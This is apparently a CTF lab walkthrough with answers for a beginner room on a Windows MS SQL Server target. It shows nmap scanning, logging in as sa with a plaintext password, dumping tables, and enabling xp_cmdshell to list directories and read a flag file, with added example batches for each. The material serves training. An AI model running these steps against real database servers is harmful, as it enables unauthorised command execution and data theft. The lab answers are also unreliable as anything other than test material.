1. You decided that the first step would be to check the running services on MACHINE_IP. You resort to yesterday's tool, Nmap.
Knowing that MACHINE_IP is an MS Windows system, you expect it not to respond to ping probes by default; therefore, you need to add -Pn to your nmap command to perform the scan. This instructs Nmap to skip the host-discovery (ping) stage and treat the target as up. Without this option, a host that does not answer the ping probes is marked as down and Nmap will not port-scan it at all.
There is an open port related to MS SQL Server accessible over the network. What is the port number?
ANS: 1433
EXPLANATION:
Step 1: Type this command on terminal:
nmap -Pn 10.10.218.241
The relevant line in the output is 1433/tcp open ms-sql-s; 1433/tcp is the default port of Microsoft SQL Server.
2. Knowing that MS SQL Server is running and accessible over the network, we want to check whether our username and password are still valid. Using the AttackBox terminal, we will use the command sqsh (pronounced "skwish"), an interactive database shell.
A simple syntax would be sqsh -S server -U username -P password, where:
-S server is used to specify the server, for example -S MACHINE_IP
-U username is used to provide the username; for example, -U sa, the username that we have enabled
-P password lets us specify the password
Let's try to run sqsh -S MACHINE_IP -U sa -P t7uLKzddQzVjVFJp
If the connection is successful, you will get a prompt. What is the prompt that you have received?
ANS: 1>
EXPLANATION:
Step 1: Type this command on terminal:
sqsh -S 10.10.218.241 -U sa -P t7uLKzddQzVjVFJp
3. McDatabaseAdmin told us the database name is reindeer and it has three tables:
names
presents
schedule
To display the contents of a table, you could use the following syntax: SELECT * FROM table_name WHERE condition, where:
SELECT is used to return specific columns (attributes); * refers to all the columns
FROM table_name specifies the table you want to read from
WHERE condition specifies which rows (entities) to return; leave it out to return every row
In the terminal below, we executed the query SELECT * FROM reindeer.dbo.names; which dumps all the contents of the table names from the database reindeer. The three-part name database.schema.table (dbo is the default schema) lets us query the table without first switching to the reindeer database. Note that the ; indicates the end of the SQL statement, while go sends the SQL batch to the database; nothing is executed until you type go.
Pentester Terminal
pentester@TryHackMe$ sqsh -S MACHINE_IP -U sa -P "t7uLKzddQzVjVFJp"
1> SELECT * FROM reindeer.dbo.names;
2> go
id          first                                    last                                     nickname
----------- ---------------------------------------- ---------------------------------------- ----------------------------------------
1           Dasher                                   Dasher                                   Dasher
2           Dancer                                   Dancer                                   Dancer
3           Prancer                                  Prancer                                  Prancer
4           Vixen                                    Vixen                                    Vixen
5           Comet                                    Comet                                    Comet
6           Cupid                                    Cupid                                    Cupid
7           Donner                                   Donder                                   Dunder
8           Blitzen                                  Blixem                                   Blitzen
9           Rudolph                                  Reindeer                                 Red Nosed
(9 rows affected)
3.1 We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
ANS: Rudolph
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.names;
Step 2: go
3.2 Check the table schedule
. What is the destination of the trip scheduled on December 7?
ANS: Prague
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.schedule;
Step 2: go
3.3 Check the table presents
. What is the quantity available for the present “Power Bank”?
ANS: 25000
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.presents;
Step 2: go
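Rather than trusting McDatabaseAdmin's description of the database, a tester would normally enumerate the databases, tables and columns from SQL Server's own catalog views and then filter with WHERE instead of dumping whole tables. The batch below is an added example, not part of the original room or this write-up; it assumes the sqsh session from step 2 (sa on MACHINE_IP) and uses only the column names of the names table shown in the dump above.

```sql
-- Added example (not the room's own queries). Run inside the sqsh session
-- opened in step 2; sqsh sends nothing to the server until you type "go".

-- 1. Which databases exist on this instance? sys.databases lists them all,
--    so we do not have to rely on someone telling us the name "reindeer".
SELECT name, database_id FROM master.sys.databases;
go

-- 2. Which user tables does the reindeer database contain?
SELECT TABLE_SCHEMA, TABLE_NAME
FROM reindeer.INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
go

-- 3. Which columns does each table have? Knowing the column names lets you
--    write a WHERE clause for schedule and presents instead of dumping them.
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM reindeer.INFORMATION_SCHEMA.COLUMNS
ORDER BY TABLE_NAME, ORDINAL_POSITION;
go

-- 4. Question 3.1 with a WHERE clause: return only the row we care about.
--    Columns id/first/last/nickname are the ones shown in the dump above.
SELECT first, last, nickname
FROM reindeer.dbo.names
WHERE id = 9;
go

-- 5. Pattern matching with LIKE, for when the exact value is unknown.
--    Against the dump above this returns Dasher, Dancer and Dunder.
SELECT id, nickname
FROM reindeer.dbo.names
WHERE nickname LIKE 'D%';
go
```

Once step 3 has shown the column names of presents and schedule, the same LIKE form (for example LIKE '%Power Bank%' on the column holding the present name) answers questions 3.2 and 3.3 without reading through the whole table.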
4. There is a flag hidden in the grinch user's home directory. What are its contents?
ANS: THM{YjtKeUy2qT3v5dDH}
EXPLANATION:
xp_cmdshell is a stored procedure that lets a sysadmin login run operating-system commands from inside the SQL session; the sa login is a sysadmin, and the procedure is already enabled on this machine. Each command is its own batch, so every line is followed by go.
Step 1: xp_cmdshell 'dir c:\Users';
Step 2: go
Step 3: xp_cmdshell 'dir c:\Users\grinch';
Step 4: go
Step 5: xp_cmdshell 'dir c:\Users\grinch\Documents';
Step 6: go
Step 7: xp_cmdshell 'type c:\Users\grinch\Documents\flag.txt';
Step 8: go
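xp_cmdshell is disabled by default on SQL Server, and only sysadmin logins may enable or call it; the steps above work because sa is a sysadmin and the room had already switched the procedure on. The batch below is an added example, not the room's or the author's commands: it shows how a tester checks both conditions, enables the procedure only if needed, runs the directory listing and file read, and restores the setting afterwards. It assumes the same sqsh session (sa on MACHINE_IP) and a Windows target.

```sql
-- Added example (not part of the original write-up). Same sqsh session as
-- step 2; type "go" after each batch as shown.

-- 1. Is our login a sysadmin? xp_cmdshell needs that role (sa has it).
--    IS_SRVROLEMEMBER returns 1 for a member and 0 otherwise.
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
go

-- 2. Is xp_cmdshell enabled? It is off on a default install;
--    value_in_use = 1 means enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
go

-- 3. If value_in_use is 0, a sysadmin can turn it on. The change is
--    written to the SQL Server error log, so defenders can watch for it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

-- 4. Run OS commands. Output comes back as one row per line of stdout.
--    Commands run as the SQL Server service account, not as grinch, so what
--    is readable depends on that account's NTFS permissions.
EXEC xp_cmdshell 'whoami';
go
EXEC xp_cmdshell 'dir C:\Users';
go
EXEC xp_cmdshell 'dir C:\Users\grinch\Documents';
go
EXEC xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';
go

-- 5. Tidy up: leave the setting as you found it if it was disabled.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
go
```

The whoami result in step 4 is worth recording in the report: a SQL Server service running as a highly privileged account turns a leaked sa password into full control of the host, which is exactly why sa should be disabled or heavily restricted and xp_cmdshell left off.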
*****************THANK YOU****KEEP LEARNING ******************
I HOPE THIS WALKTHROUGH HELPS YOU. IF SO, A LIKE ON THE PAGE WILL BE MUCH APPRECIATED, AND FOLLOW MY PROFILE FOR MORE WRITE-UPS
*******PEACE*****